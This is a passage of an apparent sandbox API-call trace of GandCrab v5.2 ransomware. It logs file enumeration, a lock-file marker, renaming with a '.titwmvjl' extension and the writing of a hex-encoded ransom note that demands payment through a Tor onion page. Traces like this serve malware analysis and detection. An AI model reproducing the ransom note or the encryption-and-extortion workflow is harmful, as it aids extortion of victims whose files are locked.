x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.163] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0096.163] CloseHandle (hObject=0x2bc) returned 1 [0096.163] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.164] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.164] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1d9)) [0096.164] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.164] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.164] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.164] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock") returned 81 [0096.164] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0096.166] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.166] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.166] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\") returned 57 [0096.166] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0096.166] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5034f8 [0096.167] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.167] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.167] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.167] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.167] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.167] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.167] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.167] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock" [0096.168] lstrlenW (lpString=".titwmvjl") returned 9 [0096.168] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock") returned 81 [0096.168] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.168] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 90 [0096.168] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\d2ca4a09d2ca4deb61a.lock") returned 81 [0096.168] lstrlenW (lpString=".lock") returned 5 [0096.168] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.168] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.168] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.168] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.168] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.168] lstrcmpW (lpString1="Gadgets", lpString2=".") returned 1 [0096.168] lstrcmpW (lpString1="Gadgets", lpString2="..") returned 1 [0096.168] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="Gadgets" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0096.169] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\" [0096.169] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.169] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.170] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.170] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.170] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\\\TITWMVJL-DECRYPT.txt") returned 86 [0096.170] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0096.171] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\